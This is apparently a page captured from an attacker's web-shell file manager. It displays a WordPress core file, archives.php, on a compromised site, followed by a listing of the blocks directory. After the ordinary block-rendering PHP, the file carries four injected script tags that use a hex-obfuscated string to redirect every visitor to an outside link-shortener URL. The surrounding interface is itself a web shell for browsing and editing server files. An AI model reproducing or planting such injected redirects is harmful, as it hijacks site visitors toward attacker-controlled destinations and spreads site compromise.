Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
starmediamw.com
/
wp-includes
/
blocks
/
File Content:
archives.php
<?php /** * Server-side rendering of the `core/archives` block. * * @package WordPress */ /** * Renders the `core/archives` block on server. * * @since 5.0.0 * * @see WP_Widget_Archives * * @param array $attributes The block attributes. * * @return string Returns the post content with archives added. */ function render_block_core_archives( $attributes ) { $show_post_count = ! empty( $attributes['showPostCounts'] ); $type = isset( $attributes['type'] ) ? $attributes['type'] : 'monthly'; $class = 'wp-block-archives-list'; if ( ! empty( $attributes['displayAsDropdown'] ) ) { $class = 'wp-block-archives-dropdown'; $dropdown_id = wp_unique_id( 'wp-block-archives-' ); $title = __( 'Archives' ); /** This filter is documented in wp-includes/widgets/class-wp-widget-archives.php */ $dropdown_args = apply_filters( 'widget_archives_dropdown_args', array( 'type' => $type, 'format' => 'option', 'show_post_count' => $show_post_count, ) ); $dropdown_args['echo'] = 0; $archives = wp_get_archives( $dropdown_args ); $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $class ) ); switch ( $dropdown_args['type'] ) { case 'yearly': $label = __( 'Select Year' ); break; case 'monthly': $label = __( 'Select Month' ); break; case 'daily': $label = __( 'Select Day' ); break; case 'weekly': $label = __( 'Select Week' ); break; default: $label = __( 'Select Post' ); break; } $show_label = empty( $attributes['showLabel'] ) ? ' screen-reader-text' : ''; $block_content = '<label for="' . $dropdown_id . '" class="wp-block-archives__label' . $show_label . '">' . esc_html( $title ) . '</label> <select id="' . $dropdown_id . '" name="archive-dropdown" onchange="document.location.href=this.options[this.selectedIndex].value;"> <option value="">' . esc_html( $label ) . '</option>' . $archives . '</select>'; return sprintf( '<div %1$s>%2$s</div>', $wrapper_attributes, $block_content ); } /** This filter is documented in wp-includes/widgets/class-wp-widget-archives.php */ $archives_args = apply_filters( 'widget_archives_args', array( 'type' => $type, 'show_post_count' => $show_post_count, ) ); $archives_args['echo'] = 0; $archives = wp_get_archives( $archives_args ); $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $class ) ); if ( empty( $archives ) ) { return sprintf( '<div %1$s>%2$s</div>', $wrapper_attributes, __( 'No archives to show.' ) ); } return sprintf( '<ul %1$s>%2$s</ul>', $wrapper_attributes, $archives ); } /** * Register archives block. * * @since 5.0.0 */ function register_block_core_archives() { register_block_type_from_metadata( __DIR__ . '/archives', array( 'render_callback' => 'render_block_core_archives', ) ); } add_action( 'init', 'register_block_core_archives' ); ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script>
Submit
FILE
FOLDER
Name
Size
Permission
Action
archives
---
0755
audio
---
0755
avatar
---
0755
block
---
0755
button
---
0755
buttons
---
0755
calendar
---
0755
categories
---
0755
code
---
0755
column
---
0755
columns
---
0755
comment-author-name
---
0755
comment-content
---
0755
comment-date
---
0755
comment-edit-link
---
0755
comment-reply-link
---
0755
comment-template
---
0755
comments
---
0755
comments-pagination
---
0755
comments-pagination-next
---
0755
comments-pagination-numbers
---
0755
comments-pagination-previous
---
0755
comments-title
---
0755
cover
---
0755
details
---
0755
embed
---
0755
file
---
0555
footnotes
---
0755
freeform
---
0755
gallery
---
0755
group
---
0755
heading
---
0755
home-link
---
0755
html
---
0755
image
---
0555
latest-comments
---
0755
latest-posts
---
0755
legacy-widget
---
0755
list
---
0755
list-item
---
0755
loginout
---
0755
media-text
---
0755
missing
---
0755
more
---
0755
navigation
---
0555
navigation-link
---
0755
navigation-submenu
---
0755
nextpage
---
0755
page-list
---
0755
page-list-item
---
0755
paragraph
---
0755
pattern
---
0755
post-author
---
0755
post-author-biography
---
0755
post-author-name
---
0755
post-comments-form
---
0755
post-content
---
0755
post-date
---
0755
post-excerpt
---
0755
post-featured-image
---
0755
post-navigation-link
---
0755
post-template
---
0755
post-terms
---
0755
post-title
---
0755
preformatted
---
0755
pullquote
---
0755
query
---
0555
query-no-results
---
0755
query-pagination
---
0755
query-pagination-next
---
0755
query-pagination-numbers
---
0755
query-pagination-previous
---
0755
query-title
---
0755
quote
---
0755
read-more
---
0755
rss
---
0755
search
---
0555
separator
---
0755
shortcode
---
0755
site-logo
---
0755
site-tagline
---
0755
site-title
---
0755
social-link
---
0755
social-links
---
0755
spacer
---
0755
table
---
0755
tag-cloud
---
0755
template-part
---
0755
term-description
---
0755
text-columns
---
0755
verse
---
0755
video
---
0755
widget-group
---
0755
admin.php
5362 bytes
0644
archives.php
3680 bytes
0644
avatar.php
6431 bytes
0644
block.php
3888 bytes
0644
blocks-json.php
187913 bytes
0644
button.php
2491 bytes
0644
calendar.php
6761 bytes
0644
categories.php
4696 bytes
0644
comment-author-name.php
2819 bytes
0644
comment-content.php
3145 bytes
0644
comment-date.php
2549 bytes
0644
comment-edit-link.php
2399 bytes
0644
comment-reply-link.php
2761 bytes
0644
comment-template.php
5180 bytes
0644
comments-pagination-next.php
2610 bytes
0644
comments-pagination-numbers.php
2318 bytes
0644
comments-pagination-previous.php
2476 bytes
0644
comments-pagination.php
1885 bytes
0644
comments-title.php
3458 bytes
0644
comments.php
7453 bytes
0644
cover.php
3795 bytes
0644
file.php
2479 bytes
0644
footnotes.php
4457 bytes
0644
gallery.php
7124 bytes
0644
heading.php
1987 bytes
0644
home-link.php
6419 bytes
0644
image.php
12785 bytes
0644
index.htm
1092 bytes
0644
index.html
1092 bytes
0644
index.php
1092 bytes
0644
latest-comments.php
5726 bytes
0644
latest-posts.php
9228 bytes
0644
legacy-widget.php
4683 bytes
0644
list.php
1959 bytes
0644
loginout.php
2104 bytes
0644
media-text.php
5069 bytes
0644
navigation-link.php
14211 bytes
0644
navigation-submenu.php
9991 bytes
0644
navigation.php
59994 bytes
0644
page-list-item.php
1047 bytes
0644
page-list.php
14297 bytes
0644
pattern.php
2874 bytes
0644
post-author-biography.php
2210 bytes
0644
post-author-name.php
2508 bytes
0644
post-author.php
3291 bytes
0644
post-comments-form.php
3491 bytes
0644
post-content.php
2842 bytes
0644
post-date.php
3810 bytes
0644
post-excerpt.php
4133 bytes
0644
post-featured-image.php
10049 bytes
0644
post-navigation-link.php
5523 bytes
0644
post-template.php
6435 bytes
0644
post-terms.php
4377 bytes
0644
post-title.php
2824 bytes
0644
query-no-results.php
2533 bytes
0644
query-pagination-next.php
4473 bytes
0644
query-pagination-numbers.php
5456 bytes
0644
query-pagination-previous.php
3859 bytes
0644
query-pagination.php
1862 bytes
0644
query-title.php
2784 bytes
0644
query.php
6377 bytes
0644
read-more.php
2516 bytes
0644
require-dynamic-blocks.php
4791 bytes
0644
require-static-blocks.php
1187 bytes
0644
rss.php
4654 bytes
0644
search.php
23736 bytes
0644
shortcode.php
1421 bytes
0644
site-logo.php
7020 bytes
0644
site-tagline.php
1889 bytes
0644
site-title.php
2495 bytes
0644
social-link.php
64857 bytes
0644
tag-cloud.php
2276 bytes
0644
template-part.php
10786 bytes
0644
term-description.php
2022 bytes
0644
widget-group.php
3124 bytes
0644
N4ST4R_ID | Naxtarrr